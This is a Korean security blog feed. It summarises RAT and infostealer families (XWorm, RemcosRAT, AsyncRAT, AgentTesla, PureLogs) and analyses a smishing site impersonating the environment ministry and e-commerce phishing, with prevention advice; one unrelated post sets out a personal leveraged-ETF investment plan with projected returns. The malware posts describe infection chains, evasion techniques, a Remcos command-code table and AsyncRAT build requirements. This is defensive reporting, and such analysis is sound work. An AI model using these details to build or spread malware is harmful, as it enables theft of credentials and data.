Cago_Note

XWorm v5.6 간단 정리

카고형 — Fri, 10 Oct 2025 19:26:07 +0900

XWorm v5.6 — 무엇이고 어떻게 공격하는가

TL;DR
XWorm v5.6은 .NET 기반의 원격접근 트로이목마(RAT)로, 스크린샷·키로깅·파일 탈취·원격 명령 실행·DDoS 등 다양한 악성 행위를 수행할 수 있습니다. 주로 스크립트 드로퍼(WSF/VBS/PowerShell 등)를 통해 유포되며, 난독화·프로세스 주입·암호화 통신으로 탐지를 회피합니다. 자세한 분석 원문은 아래를 참고하세요.
원문 분석: https://cago-young.tistory.com/226

소개

XWorm은 Windows 환경에서 동작하는 .NET 기반 RAT(원격접근 트로이목마) 계열 악성코드입니다. 기능이 풍부하고 유연해 공격자가 다양한 목적(정보 탈취, 원격 제어, 네트워크 교란 등)에 맞게 활용할 수 있습니다. 최신 변종은 난독화와 암호화, 프로세스 인젝션 등 탐지 회피 기법을 사용합니다.

킬 체인 — XWorm 공격 흐름 (단계별)

정찰 (Reconnaissance)
공격자는 표적(개인 또는 조직)을 선정하고, 피싱메일·사회공학 기법으로 신뢰를 쌓을 방법을 준비합니다.
전달 (Delivery)
피싱 이메일의 첨부파일(문서, 압축파일)이나 외부 호스팅(paste.ee 등)에 올린 스크립트 링크를 통해 드로퍼(WSF/VBS/PS1 등)가 전달됩니다.
악용·실행 (Exploitation / Execution)
사용자가 문서를 열거나 스크립트를 실행하면, 매크로나 스크립트가 동작해 드로퍼 체인이 실행됩니다. 드로퍼는 추가 페이로드(.NET DLL 또는 실행파일)를 다운로드·실행합니다.
설치·유지 (Installation / Persistence)
페이로드는 시스템에 설치되어(혹은 메모리 상에서 로드되어) 레지스트리, 작업 스케줄러, 시작 폴더 등을 이용해 재부팅 후에도 동작하도록 지속성을 확보합니다.
명령·제어 연결 (Command & Control — C2)
감염 호스트는 암호화된 채널로 C2 서버와 통신을 수립하고, 주기적 핑과 함께 원격 명령을 수신합니다.
목적 수행 (Actions on Objectives)
공격자는 화면 캡처, 키로깅, 파일 검색·업로드·다운로드, 호스트 파일 조작(DNS 변조 가능), 원격 명령 실행, DDoS 등 다양한 행위를 수행해 정보 수집·탈취 또는 시스템 교란을 일으킵니다.

주요 기능(간단 요약)

화면 캡처 및 실시간 원격 보기
키로깅(입력 기록)
파일 업로드/다운로드 및 원격 파일 실행
프로세스 주입을 통한 탐지 회피
네트워크 명령 실행(예: DDoS)
설정·통신 암호화(변종에 따라 AES 등 사용)

감염 경로에서 주의할 점

특히 .wsf, .vbs, .ps1, .docx 내 매크로, 압축파일(.zip/.rar) 내부 실행 파일 등 스크립트 기반 드로퍼를 통한 감염 사례가 많습니다.
공격 체인은 여러 파일을 거치는 경우가 흔하므로 “한 파일만 열어도” 최종 페이로드가 내려올 수 있다는 점을 염두에 두세요.

사용자가 바로 적용할 수 있는 예방 수칙

의심스러운 메일·첨부파일은 열지 않기 — 특히 출처 불분명한 문서, 압축파일, 실행 권유 메시지 주의.
매크로·스크립트 기본 비활성화 — 문서가 매크로 실행을 요구하면 발신자 확인 후에도 실행 금지.
윈도우·오피스·브라우저 등 주요 소프트웨어는 최신 상태 유지 — 보안 패치 적용.
백신/EDR 사용 및 정기 검사 — 의심 파일을 발견하면 격리 후 전문가에게 문의.
중요 계정은 2단계 인증(OTP) 사용 — 비밀번호 유출 시 추가 방어막 제공.
비밀번호 재사용 금지·주기적 변경 — 한 계정 노출이 다른 계정으로 번지지 않도록.
스크립트(.ps1/.vbs/.wsf 등) 파일은 함부로 실행하지 않기 — 개발자용 파일도 출처 확인 필요.

마무리

XWorm은 기능이 다양하고 진화하는 악성코드입니다. 다행히도 대부분의 공격은 피싱·의심 파일 실행 같은 사람의 실수를 노리므로, 작은 주의(메일 주의, 매크로 비활성화, 업데이트, 백신, 2단계 인증)만으로도 피해 위험을 크게 줄일 수 있습니다.

원문 전문 분석(기술적 세부사항)은 아래를 참고하세요.
원문 분석: https://cago-young.tistory.com/226

[분석]XWorm v5.6: .NET 기반 트로이 목마(RAT)

[분석]XWorm v5.6: .NET 기반 트로이 목마(RAT)Xworm은 그 어떤 악성 프로그램과도 비교할 수 없을 만큼 강력하고 교묘한 **원격 접근 트로이 목마(RAT)**입니다. Windows 운영 체제를 타겟으로 하는 이 악성

cago-young.tistory.com

2025.10 기록용 장기 포트폴리오 로드맵

카고형 — Wed, 8 Oct 2025 05:34:00 +0900

[투자 전략 기록] 2025~2035 장기 포트폴리오 로드맵

“현재 계좌 + 월 140만 원 적립 기반, 복리 9% 목표 시나리오”

1️⃣ 현재 포트폴리오 상태 (2025년 10월 기준)

자산	비중(%)	성격
TMF	5%	초장기채 3배 ETF
TLT	15%	장기채권 ETF
TQQQ	22%	NASDAQ 3배 성장 ETF
SCHD	50%	고배당·복리 ETF
SOXL	8%	반도체 3배 ETF
총계	100%	초기 포트 가치 약 ₩2,200만 원

현재 진단:

SCHD 비중이 높아 안정성은 충분하지만, 성장주 비중이 낮음
채권(TLT·TMF) 은 금리 인하기 반등 여력 존재
SOXL 은 AI/반도체 사이클 초입기

2️⃣ 월 적립금 계획

매달 투자금: ₩1,400,000 (≈ $1,000)
연간: 약 $12,000
10년 총 적립: 약 $120,000
기존 자산 포함 총 원금: $135,000

3️⃣ 월별 자산 분배 비중 (2025~26 기준)

구분ETF월 투자금(₩)비중설명

성장주	TQQQ, SOXL	600,000	43%	성장주 핵심구간 집중
배당주	SCHD	200,000	14%	이미 충분한 보유분, 복리유지
채권	TLT, TMF	400,000	29%	금리 인하기 수익성 높음
방어·인플레헤지	XLV, XLU, GLD	100,000	7%	향후 조정기 대비 완충
현금/단기채	SGOV	100,000	7%	리스크 발생 시 유동성 확보

4️⃣ 2025~2035 비중 변화 시나리오 요약

자산군구성 ETF2025202820302035전략 요약

성장주	TQQQ, SOXL, SOXX	30% →	25% →	40% →	35%	과열기 일부익절 → 신사이클 재진입
배당주	SCHD	50% →	40% →	30% →	30%	꾸준한 복리 성장 기반
채권자산	TLT, TMF, BND	15% →	25% →	20% →	20%	금리 사이클 방어 및 안정수익
방어주/헬스케어	XLV, XLU, GLD	0% →	10% →	10% →	10%	변동성 완화 및 방어 포트
신성장 테마	SOXX, ICLN	0% →	0% →	7% →	5~10%	AI·클린테크 구조적 성장 대응

5️⃣ 연도별 주요 전략 요약

연도시장상황행동전략주요 포인트

2025~26	금리 인하, 경기 회복 초입	성장(TQQQ·SOXL) + 채권(TLT·TMF) 집중매수	금리 인하 초기 랠리 구간
2027	과열 구간	성장 일부익절, XLV·GLD 진입	밸류 조정 대비
2028	조정 / 인플레 재자극	채권·방어 비중 확대	TLT 재매수 구간
2029~30	신사이클(AI·친환경)	SOXX·ICLN 신규 진입	2차 성장 파동기
2031~32	중기조정 / 금리상승	배당·채권 중심 방어	고평가 구간 조정기
2033~35	복리 안정기	성장·배당 균형 유지	장기 복리 기반 안정성 확보

6️⃣ 예상 수익률 (2025~2035 기준)

구분추정 연복리(CAGR)누적 수익률(10년)예상 평가금 (USD)비고

보수 시나리오	7.0%	+96%	$265,000
기준 시나리오 (현실적)	8.8%	+133%	$315,000	약 ₩4억 수준
낙관 시나리오 (AI 랠리 지속)	10%	+160%	$350,000	최대치 시나리오

평균 목표 연복리: 8.5~9.0% (세전 기준)

배당 재투자 포함 시 실질수익률 약 9.5~10% 수준
연평균 변동성(리스크): 약 12~14%
현금흐름 안정성: SCHD 배당수익률 3~4% 예상

7️⃣ 핵심 포인트 요약

항목내용

투자목표	2035년까지 복리 9%, 총 평가액 $300,000 (한화 약 4억 원)
핵심전략	성장주 + 배당 + 채권의 3축 균형 구조
리스크 관리	2027~28 / 2031년 조정기 현금비중 상향
현금흐름	SCHD·XLV·XLU 배당 재투자로 복리 극대화
리밸런싱 주기	분기별 소폭 조정, 연 1회 구조 리밸런싱
장기 구조	2025~26 상승 → 2027 과열 → 2028 조정 → 2029~30 신사이클 → 2033~35 안정복리

8️⃣ 결론

“지금 포트폴리오는 이미 밸런스가 좋다.
SCHD로 안정성을 확보했고, TQQQ·SOXL로 성장성을 얻으며,
TLT·TMF가 금리 사이클 완충을 담당한다.
여기에 매달 140만 원의 추가 투자는 복리효과를 폭발적으로 만든다.”

✅ 목표 CAGR: 8.5~9.0%
✅ 목표 평가액(2035): $300K 내외 (한화 약 4억 원)
✅ 전략 핵심: 성장 + 배당 + 금리 방어의 3축 복리 시스템

운용 계획:

블로그에 이 전략을 “2025~2035 투자 다이어리”로 기록
이후 시장 변화(금리, 경기, AI/반도체 주기)에 따라 분기별 점검
2026년부터 실제 리밸런싱 기록과 수익률 차트를 병행 관리

RemcosRAT 6.0.0 Pro 간단 정리

카고형 — Mon, 6 Oct 2025 22:19:47 +0900

RemcosRAT 6.0.0 Pro — 상용 RAT의 악성화 과정

TL;DR
RemcosRAT는 독일 Breaking Security사에서 합법적 원격 관리용으로 개발된 상용 프로그램이지만, 2016년 이후 사이버 범죄자들에게 악용되어 강력한 정보 탈취·원격 제어 악성코드로 자리 잡았습니다.
CVE-2017-11882 취약점과 VBE 스크립트를 통한 감염, 지속적인 버전 업데이트, 그리고 다양한 원격 명령 기능이 특징입니다.
참고 원문: https://cago-young.tistory.com/227

[분석] RemcosRAT 6.0.0 Pro

보호되어 있는 글입니다. 내용을 보시려면 비밀번호를 입력하세요.

cago-young.tistory.com

RemcosRAT이란?

Remcos(Remote Control & Surveillance)는 Windows 환경에서 원격 접근 및 감시를 목적으로 만들어진 RAT(Remote Access Trojan)입니다.
원래는 **Breaking Security(독일)**가 개발한 합법 상용 프로그램이지만, 2016년경 다크웹을 통해 불법 유포되면서 악성 행위에 사용되기 시작했습니다.
2025년 현재까지도 매달 버전이 업데이트될 정도로 활발히 유지·보수되는 상용형 악성코드입니다.

Remcos는 감염된 시스템을 완전히 제어할 수 있으며, 키로깅·화면 캡처·웹캠 녹화·파일 조작 등 다양한 기능을 수행합니다.
특히 암호화된 통신(AES-128, RC4)과 프로세스 인젝션으로 탐지 회피 성능이 매우 뛰어납니다.

감염 경로 및 실행 흐름

Remcos는 주로 피싱 이메일의 악성 문서(doc) 또는 압축파일(.zip, .rar) 형태로 전달됩니다.
대표적으로 문서 내 수식편집기(EQNEDT32.EXE) 취약점 CVE-2017-11882을 악용하여 감염됩니다.

감염 절차

DOC 파일 실행 → CVE-2017-11882 취약점 이용
WSF/VBE 스크립트 다운로드 및 실행
VBScript 복호화 → HEX 디코딩 후 Remcos 실행파일(MZ 헤더) 드롭
레지스트리 등록 및 스케줄러 등록 (지속성 확보)
.NET 환경 탐지 → 조건에 따라 페이로드 분기
Remcos 페이로드 실행 및 C2 서버 연결

이후 공격자는 C2(Command & Control) 서버를 통해 명령을 전송하고, 피해 PC를 실시간으로 제어합니다

주요 기능

키로깅 / 클립보드 탈취 / 스크린샷 캡처
웹캠 및 오디오 모듈 제어
파일 업로드·다운로드 / 삭제 / 실행
프로세스 관리 / 서비스 조작 / 시스템 종료
레지스트리 조작을 통한 지속성 확보
C2 기반 자동 업데이트 (UpdateFromURL / UpdateFromC2)

Remcos는 단순 감시를 넘어, 감염된 PC를 완전히 원격 제어 가능한 수준의 RAT입니다.

VBScript 주요 기능 분석 요약

복호화된 VBE 스크립트는 다음과 같은 악성 행위를 수행합니다.

기능 구분설명

레지스트리 조작	악성 설정 및 페이로드 문자열 저장
작업 스케줄러 등록	1분 주기로 실행되는 지속성 트리거
VBS 파일 생성	%APPDATA% 경로에 악성 스크립트 생성
.NET 프레임워크 탐지	존재 시 페이로드 드롭 및 실행
안티바이러스 탐지 회피	Windows 보안 센터 키 탐색을 통한 AV 탐지
PowerShell 인젝션	Base64 인코딩된 코드 로드 및 실행

즉, 사용자의 개입 없이 완전 자동으로 감염 체인이 이어지며,
모든 설정·코드가 레지스트리 기반으로 암호화 저장되어 분석을 어렵게 만듭니다.

Remcos 동작 구조 요약 (Kill Chain)

전달 — 악성 문서/메일 첨부 → CVE-2017-11882 취약점 실행
실행 — VBScript 디코딩 및 페이로드 생성
설치 — 레지스트리 및 작업 스케줄러 등록
통신 — 암호화된 C2 연결 (TCP)
명령 수행 — 정보 탈취, 화면 캡처, 키로깅, 파일 조작
지속성 유지 — 재부팅 후 자동 실행

주요 명령 코드 테이블

코드명령설명

0x1	HeartBeat	C2 서버와 연결 상태 확인
0x6	ListRunningProcesses	실행 중인 프로세스 목록 수집
0xD	ExecuteShellCmd	쉘 명령(cmd, PowerShell) 실행
0x13	StartOnlineKeylogger	실시간 키 입력 전송
0x1B	StartWebcamModule	웹캠 녹화 시작
0x1F	StealPasswords	브라우저 저장 비밀번호 탈취
0x18	CleanBrowsersCookiesAndLogins	브라우저 쿠키/로그인 흔적 삭제
0x98	FileManager	파일 탐색, 업/다운로드, 삭제
0xB2	ShellExecuteOrInjectPE	실행 파일 실행 또는 PE 코드 인젝션
0xC6	UploadBrowsersCookiesAndPasswords	쿠키·비밀번호 업로드

전체 명령 목록은 Elastic Security Labs의 RemcosRAT Dissection 시리즈 참고.

결론

RemcosRAT 6.0.0 Pro는 “합법적 소프트웨어의 악성화”를 대표하는 사례로,
정상 도구가 공격자의 손에 들어가면 얼마나 강력한 스파이 도구가 될 수 있는지를 보여줍니다.
지속적인 버전 업데이트와 다양한 명령 구조로 인해 방어가 쉽지 않지만,
취약점 관리·메일 보안·EDR 모니터링을 병행한다면 감염 위험을 상당히 낮출 수 있습니다.

참고: https://cago-young.tistory.com/227

[분석] RemcosRAT 6.0.0 Pro

보호되어 있는 글입니다. 내용을 보시려면 비밀번호를 입력하세요.

cago-young.tistory.com

AsyncRAT v0.5.8 간단 정리

카고형 — Thu, 2 Oct 2025 09:54:58 +0900

[분석] AsyncRAT v0.5.8 — .NET 기반 원격접근 트로이목마(RAT)

TL;DR
AsyncRAT v0.5.8은 원래 합법적 원격관리용으로 공개된 오픈소스 툴이지만, 악성 변형으로 손쉽게 악용되어 키로깅·화면 캡처·자격증명 탈취·원격 제어 등 강력한 스파이 기능을 수행합니다. 주로 피싱·스크립트 드로퍼 경로로 유포되며, 파일리스 실행·프로세스 홀로잉·난독화 등으로 탐지를 회피합니다.
참고 원문: https://cago-young.tistory.com/228

[분석] AsyncRAT v0.5.8 .NET 기반 트로이 목마(RAT)

보호되어 있는 글입니다. 내용을 보시려면 비밀번호를 입력하세요.

cago-young.tistory.com

AsyncRAT이란?

AsyncRAT(Asynchronous Remote Access Trojan)은 2019년 GitHub(작성자: NYAN-x-CAT)에 처음 공개된 C# 기반 오픈소스 원격관리 도구입니다. 원래는 원격지원·관리 목적의 합법 소프트웨어였으나, 소스 공개로 인해 공격자가 코드를 수정·난독화하여 악성 RAT(원격접근 트로이목마)로 재배포하는 사례가 많아졌습니다. 대표적 변종으로 SantaRAT, BoratRAT 등이 보고되었습니다.

AsyncRAT은 클라이언트(피해측)와 서버(공격자측) 구조를 갖추고 있으며, 서버 빌더를 통해 맞춤형 바이너리를 생성할 수 있습니다. 또한 Pastebin/GitHub 등 외부 호스팅을 C2로 활용하는 설정을 지원해, 유연한 명령·제어 인프라 구성이 가능합니다.

주요 기능

키로깅: 키보드 입력 기록을 통해 비밀번호·민감정보 탈취
화면 캡처 / 원격 데스크톱: 화면 이미지 전송 또는 실시간 원격 제어
자격증명 탈취: 브라우저·시스템에 저장된 로그인 정보 수집
웹캠 액세스: 카메라를 켜고 영상 캡처 가능
파일 업/다운로드 및 실행
클라이언트-서버 채팅: 공격자와 실시간 상호작용 가능
파일리스 실행: 메모리 상에서 동작하여 디스크 흔적 최소화
난독화/빌더: 코드 난독화와 빌더로 맞춤형 페이로드 생성
플러그인 확장: StealerLib 등 외부 DLL 연동으로 기능 확장

탐지 회피 기법(기술적 포인트)

프로세스 홀로잉(Process Hollowing): 합법 프로세스에 악성 코드를 주입해 행위를 숨김
파일리스(fileless) 로딩: 디스크 흔적 없이 메모리에서 직접 실행
안티-분석 설정: 디버거·가상환경 감지 및 동작 제어
암호화 통신 및 설정 보호: C2 통신과 설정 정보를 암호화하여 분석 난이도 증가

킬체인(공격 흐름)

정찰(Recon): 표적 선정·소셜 엔지니어링 준비
전달(Delivery): 피싱 이메일 첨부, 악성 광고, 손상된 웹사이트, 익스플로잇 키트 등으로 드로퍼 전달
악용·실행(Exploit / Execution): 매크로/WSF/VBS/PowerShell 등 스크립트가 드로퍼 체인을 실행 → 페이로드 다운로드
설치·지속성(Installation / Persistence): 로더가 페이로드(.NET DLL 또는 EXE)를 메모리나 디스크에 로드하고 레지스트리/작업 스케줄러로 지속성 확보
명령·제어(C2 연결): 감염 호스트가 Pastebin/GitHub 또는 전용 C2와 암호화된 채널로 통신
목적 수행(Actions on Objectives): 키로깅·화면 캡처·자격증명 탈취·파일 전송·원격 명령 실행 등

빌드·환경 요구사항(분석가/빌더 관점)

클라이언트: .NET Framework v4 이상 필요
서버: .NET Framework v4.6+ 권장
컴파일: Visual Studio 2019 이상에서 빌드 권장
소스 코드: GitHub에서 내려받아 수정 가능(빌더/난독화 옵션 존재)
플러그인: 외부 DLL(예: StealerLib)로 기능 추가 가능

대응 및 예방 권고 (일반 사용자·관리자)

의심스러운 메일·첨부 파일 절대 실행 금지: 첨부문서 매크로·스크립트 실행 요청에 특히 주의
매크로·스크립트 기본 비활성화: 업무상 필요시에도 출처 확인 후 활성화
소프트웨어 최신화(패치 적용): OS·오피스·브라우저 등 보안 패치 필수
엔드포인트 보안 솔루션(백신/EDR) 적용: 메모리 기반 공격·프로세스 주입 탐지 기능 권장
계정 보호: 2단계 인증(OTP) 적용, 비밀번호 재사용 금지
네트워크 모니터링: 이상한 외부 연결(특히 외부 호스팅 C2로의 주기적 통신) 탐지 룰 설정
정기 백업: 탈취·파괴에 대비한 별도 백업 체계 유지

결론

AsyncRAT v0.5.8은 본래 합법적 목적의 원격관리 툴이지만, 오픈소스라는 특성 때문에 공격자에 의해 빠르게 악용되는 전형적 사례입니다. 개인·기업 모두 피싱·스크립트 실행 차단, 최신 패치 적용, 엔드포인트 방어 체계 강화를 통해 실효성 있는 방어를 구축해야 합니다. 작은 실수가 원격 스파이 활동으로 이어질 수 있다는 점을 항상 유의하세요.

참고 원문: https://cago-young.tistory.com/228

[분석] AsyncRAT v0.5.8 .NET 기반 트로이 목마(RAT)

보호되어 있는 글입니다. 내용을 보시려면 비밀번호를 입력하세요.

cago-young.tistory.com

AgentTesla 간단 정리

카고형 — Mon, 29 Sep 2025 08:36:46 +0900

AgentTesla 간단 정리

1. AgentTesla란?

.NET 기반 인포스틸러(정보 탈취형 악성코드)
2014년부터 활동, 현재까지도 꾸준히 변종이 발견됨
원래는 합법적 원격 관리 툴처럼 판매되었지만, 지금은 해커들이 악용

2. 감염 경로

주로 피싱 이메일로 유포
첨부된 Word/Excel/RTF 문서에 악성 코드 삽입
일부는 크랙 소프트웨어, 가짜 업데이트 사이트로도 배포됨

3. 주요 기능

키로깅: 사용자의 키보드 입력 기록
스크린샷/클립보드: 화면 캡처 및 복사한 텍스트 탈취
비밀번호·쿠키 탈취:
- 웹 브라우저(Chrome, Edge, Firefox 등)
- 이메일 클라이언트(Outlook)
- FTP 툴(FileZilla 등)
데이터 유출 방식: SMTP(이메일), FTP, Telegram 등 다양한 채널을 통해 전송

4. 최근 동향

CVE-2017-11882 같은 문서 취약점을 악용한 배포 증가
Telegram C2 통신 활용 사례가 늘어남
여행·호텔 예약 피싱, 기업 이메일 침해(BEC) 공격 등에서 자주 발견

[분석]AgentTesla .NET 기반 트로이 목마(RAT)

보호되어 있는 글입니다. 내용을 보시려면 비밀번호를 입력하세요.

cago-young.tistory.com

PureLogs Stealer

카고형 — Sat, 13 Sep 2025 19:17:33 +0900

PureLogs Stealer

1. 소개

PureLogs Stealer는 최근 활동이 증가한 정보 탈취형 악성코드(정보 스틸러)로, 주로 웹 브라우저, 메신저, 암호화폐 지갑 등에서 민감한 데이터를 빼돌리는 데 사용됩니다.

2. 배경 및 역사

2022년 중반부터 등장한 계열로, 기존 RedLine·Raccoon 같은 스틸러의 후속/변종으로 보는 시각이 많습니다.
다크웹 포럼에서 판매되며, 공격자가 구독형(월별·수개월 단위)으로 쉽게 구입해 활용할 수 있습니다.

3. 감염경로

피싱 이메일 첨부 파일·링크
크랙·불법 소프트웨어 위장 설치파일
악성 광고(Malvertising)
Telegram·Discord 채널을 통한 유포

4. 핵심기능

웹 브라우저 쿠키·세션·저장된 비밀번호 탈취
디스코드·텔레그램 토큰 탈취
암호화폐 지갑 정보 수집
스크린샷 캡처, 시스템 정보 수집
탈취 데이터를 C2 서버로 전송

5. 최근 동향

최근 빌더 UI 개선 → 비전문가도 손쉽게 패킹·유포 가능
탐지 회피 위해 파일리스 기법·암호화된 통신 강화
클라우드 저장소(mega.nz, anonfiles 등)로 데이터 업로드

6. 탐지 및 완화

EDR·차세대 백신 업데이트 및 실행 차단 정책
메일 보안 게이트웨이, 매크로 차단
정품 소프트웨어 사용·업데이트
정기적인 비밀번호 변경 및 MFA(다단계 인증) 적용
네트워크·로그 모니터링 강화 (이상 접속, 토큰 탈취 확인)

[분석]PureLogsStealer .NET 기반 인포스틸러

보호되어 있는 글입니다. 내용을 보시려면 비밀번호를 입력하세요.

cago-young.tistory.com

환경부 사칭 쓰레기(음식물) 스미싱 피싱 사이트 분석(25.07.25)

카고형 — Fri, 25 Jul 2025 12:33:27 +0900

환경부 사칭 쓰레기(음식물) 스미싱 피싱 사이트 분석(25.07.25)

TL;DR: 환경부 사칭 “배출장소 위반” 메시지로 유도되는 스미싱 사이트는 Android 사용자 대상 앱 설치 유도 방식이며, VirusTotal 탐지 결과를 통해 악성 앱 가능성이 높아 주의가 필요합니다.

최근에 다시 관공서를 사칭한 스미싱, 피싱 사이트가 다시 기승을 부리고 있는 거 같습니다. 저번에 작성한 정부 24(구 민원24) 사칭 , 경찰청 교통민원 피싱 내용과 유사한 형태의 스미싱을 발견했습니다. 이번에 발견한 스미싱도 비슷한 내용과 관공서 사칭을 하여 스미싱 문자를 배포하여 클릭을 유도하는 것으로 보입니다. 저번에는 키워드가 교통 관련 한 내용과 "쓰레기 무단투기"이었습니다.

경찰청 교통민원 스미싱 증가! 피싱 사이트 유포 (25.02.25)

최근 들어 스미싱 공격이 다시 운전자 대상으로 확산되고 있습니다. 2022년에는 교통위반 관련, 2023~2024년에는 생활형 범법행위(쓰레기 무단투기 등) 중심으로 스미싱이 유포되었으나, 최근에는

cago-young.tistory.com

정부24(구 민원24) 사칭 스미싱 피싱 사이트(23.11.09)

관공서 사칭 스미싱인 정부24 피싱 사이트입니다. 정부24 관련 현재 배포되고 있는 스미싱 문구는 "쓰레기 무단투기로 단속되어 과태료 부과되였습니다." 내용이 포함해 스미싱 문자를 배포하고

cago-young.tistory.com

스미싱 문구

[*부과고지안내] 배출장소위(음식물혼합) URL
*쓰레기무단투기 안내서가 발급되었습니다. URL
[*벌금통보서안내*] 배출장소위반(음식물혼합) URL
[국외발신] [*벌금고지서안내] 배출장소위반(음식물혼합) URL

문자는 저번과 마찬가지로 "쓰레기 무단투기" 도 보이고 그리고 "배출장소 위반(음식물 혼합)" 이 보이는데요 이전과 비슷하게 생활? 쓰레기 관련 문구로 만들어진 것 을 확인할수 있고 요세는 경범죄 관련 사칭이 많다고 생각 됩니다. 그리고 내용을 보면 대부분 과태료,범칙금 부과를 사칭하여 스미싱을 보내는 형태인 것을 확인 할 수 있습니다.

피싱 사이트 접속 화면

해당 사이트를 보면 환경부를 사칭해 빨간 버튼처럼 보이는 "위반내역 확인하기"를 눌러야 되는 것처럼 구성 되어 있고, HTML 살펴보면 userAgent 값을 이용해 ios 사용자는 어플을 다운로드할 수 없고, android 사용자를 타깃으로 한 것을 알아볼 수 있습니다.

해당 버튼을 누르게 되면 최종적으로 apk 파일을 다운로드되는 형태입니다. 해당 앱은 악성 앱입니다.

VirusTotal 탐지 결과

Avast-Mobile : Android:Evo-gen [Trj]
BitDefenderFalx : Android.Riskware.Agent.aCIGF
DrWeb : Android.BankBot.IOBot.2
ESET-NOD32: A Variant Of Android/Spy.Agent.EKR
Fortinet : Android/Agent.EJE!tr
Google : Detected
Ikarus : Trojan-Spy.AndroidOS.Agent
Kaspersky : HEUR:Trojan-Banker.AndroidOS.IOBot.v

요새 피싱 사이트를 잘 만들기 때문에 항상 SNS 나 SMS 등 문구를 잘 확인하시고, 개인정보 입력 요구 시에는 항상 한 번 더 생각하고, 정상 사이트인지 확인하시기 바랍니다.

검색 사이트에서 해당 회사나 기관들을 검색하시고, 검색 결과 대부분은 상위 페이지에 노출되긴 합니다... 상위 광고 페이지도 조심해야 합니다.

전화번호만 있는 경우 전화했을 때 앱 설치하라고 링크를 보내주는 건 거르시고 직접 앱 스토어에 들어가서 설치하시기 바랍니다. 항상 앱 설치 하실 때는 신뢰 가능한 원스토어나 플레이스토어 등을 이용하시는 게 좋습니다.

휴대전화 보안 그리고 악성 앱 제거 방법

KISA 스마트폰 안전 수칙 10 계명

① 의심스러운 애플리케이션 다운로드하지 않기

② 신뢰할 수 없는 사이트 방문하지 않기

③ 발신인이 불명확하거나 의심스러운 메시지 및 메일 삭제하기

④ 비밀번호 설정 기능을 이용하고 정기적으로 비밀번호 변경하기

⑤ 블루투스 등 무선인터페이스는 사용 시에만 켜놓기

⑥ 이상 증상이 지속될 경우 악성코드 감염 여부 확인하기

⑦ 다운로드한 파일은 바이러스 유무를 검사한 후 사용하기

⑧ PC에도 백신 프로그램을 설치하고 정기적으로 바이러스 검사하기

⑨ 스마트폰 플랫폼의 구조를 임의로 변경하지 않기

⑩ 운영체제 및 백신 프로그램을 항상 최신 버전으로 업데이트하기

이커머스 피싱이란?

카고형 — Tue, 13 May 2025 22:27:29 +0900

1. 이커머스 피싱이란?

이커머스 피싱(e-commerce phishing)은 온라인 쇼핑을 이용한 사이버 범죄로, 가짜 쇼핑몰이나 사칭 이메일을 통해 사용자의 개인 정보와 결제 정보를 탈취하는 행위입니다. 한국에서는 Coupang, 11번가 같은 플랫폼의 인기가 높아지면서 이커머스 피싱이 점점 더 정교해지고 있습니다. 공격자는 AI 기술을 활용해 개인화된 피싱 이메일을 보내거나, 유명 브랜드를 사칭하여 신뢰를 얻습니다.

이커머스 피싱의 주요 특징

목표: 신용카드 정보, 계좌 정보, 로그인 자격 증명 등 민감한 데이터 탈취.
영향: 금전적 손실, 개인 정보 유출, 신원 도용.

2. 이커머스 피싱의 주요 수법

이커머스 피싱은 다양한 형태로 나타나며, 다음과 같은 수법이 주로 사용됩니다:

수법 설명

가짜 쇼핑몰 운영	유명 브랜드나 쇼핑몰을 사칭하여 가짜 웹사이트를 만들고 결제를 유도합니다.
개인 정보 및 결제 정보 탈취	정상적인 쇼핑몰로 위장하여 신용카드 정보, 계좌 정보 등을 입력하도록 유도합니다.
배송 사기	가짜 운송장 번호를 제공하거나, 배송 지연을 이유로 추가 결제를 요구합니다.
소셜 미디어 광고 피싱	SNS 광고를 통해 가짜 쇼핑몰로 유도하여 사기를 칩니다.
피싱 이메일 및 문자	"구매 완료", "환불 진행" 등의 메시지로 위장하여 피싱 사이트로 유도합니다.
리뷰 아르바이트 사칭	고수익 아르바이트를 제안하며, 가짜 쇼핑몰에서 물건을 구매하고 리뷰를 작성하도록 유도합니다.
팀 미션 부업 사기	여러 참가자가 팀을 이루어 리뷰 아르바이트를 진행하며 더 큰 투자를 유도합니다.
국가기관 사칭	군인, 소방, 교도소 등 국가기관을 사칭하여 물품 구매 대리 결제 명목으로 금전을 가로챕니다.

이러한 수법은 사용자의 신뢰를 악용하여 금전적 피해를 초래하거나 개인 정보를 탈취하는 데 초점이 맞춰져 있습니다.

3. 한국 내 실제 이커머스 피싱 사례

한국에서는 이커머스 피싱이 심각한 문제로 대두되고 있으며, 특히 온라인 쇼핑의 인기가 높아지면서 피해 사례가 증가하고 있습니다. 다음은 대표적인 사례입니다:

사례 1: A씨는 쿠팡 입점 쇼핑몰 담당자를 사칭하는 사기꾼에게 속아 가짜 쇼핑몰 링크를 받았습니다. 사기꾼은 신규 쇼핑몰이라 홍보 차원에서 리뷰 아르바이트를 진행한다며 A씨를 안심시켰습니다.
사례 2: B씨는 해외 쇼핑몰 운영 제안을 받고 앱을 설치했으나, 쇼핑몰이 동결되었다는 이유로 복구 비용을 요구받았습니다.
사례 3: C씨는 쇼핑 플랫폼 환불을 사칭한 피싱 문자를 받고 악성 앱을 설치하여 휴대폰이 해킹당하는 피해를 입었습니다.
사례 4: 개그우먼 김니나는 이커머스 피싱으로 전 재산 8700만원을 잃었다고 고백했습니다.

4. 이커머스 피싱 예방 방법

사이트 신뢰성 확인:
- URL이 "https://"로 시작하고 자물쇠 아이콘이 있는지 확인하세요.
- 공식 도메인인지 확인하세요 (예: "coupang.com"이 아닌 "coupang-korea.com"은 의심스러움).
이메일 및 문자 주의:
- 알 수 없는 발신자의 이메일이나 문자 메시지 링크는 클릭하지 마세요.
- "결제 확인" 또는 "배송 문제"와 같은 제목은 특히 조심하세요.
리뷰와 평판 확인:
- 구매 전 사이트의 리뷰와 평판을 확인하세요.
- 터무니없이 낮은 가격이나 과도한 할인은 사기의 징후일 수 있습니다.
결제 안전성:
- 가능하면 가상 계좌나 간편 결제 수단을 사용하세요.
  - 오류등 이유로 계좌 입급등 유도 할 가능성이 있습니다.
- 신용카드 정보를 입력하기 전에 사이트의 신뢰성을 확인하세요.

5. 피해 신고 방법

이커머스 피싱 피해를 입었다면 즉시 다음 기관에 신고하세요:

KISA (Korea Internet & Security Agency) (KISA):
- 전화: 118 (국내)
- 24시간 운영
- 신고 시 필요한 증거: 피싱 사이트 URL, 이메일 내용, 거래 내역, 사업자 등록증, 증적 자료 등등

신고는 2차 피해를 줄이고 범죄자를 추적하는 데 중요한 역할을 합니다.

6. 결론

